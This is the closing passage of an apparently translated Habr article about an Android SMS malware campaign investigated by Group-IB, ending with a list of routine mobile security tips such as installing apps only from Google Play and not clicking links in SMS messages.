Fortunately, the person who received the SMS message described at the beginning of the article turned out to be a cybersecurity specialist. So the real, non-director's-cut version differs from the one told earlier: the person received an interesting SMS and then handed it over to the Group-IB Threat Hunting Intelligence team. The result of the attack is this article. A happy ending, isn't it? However, not every story ends so well, and so that yours does not turn into the director's cut with lost money, it is usually enough to follow the long-established rules:

  • do not install applications on an Android device from anywhere other than Google Play
  • when installing an application, pay close attention to the permissions it requests
  • pay attention to the extensions of downloaded files
  • install Android OS updates regularly
  • do not visit suspicious resources and do not download files from them
  • do not click links received in SMS messages.

Source: www.habr.com
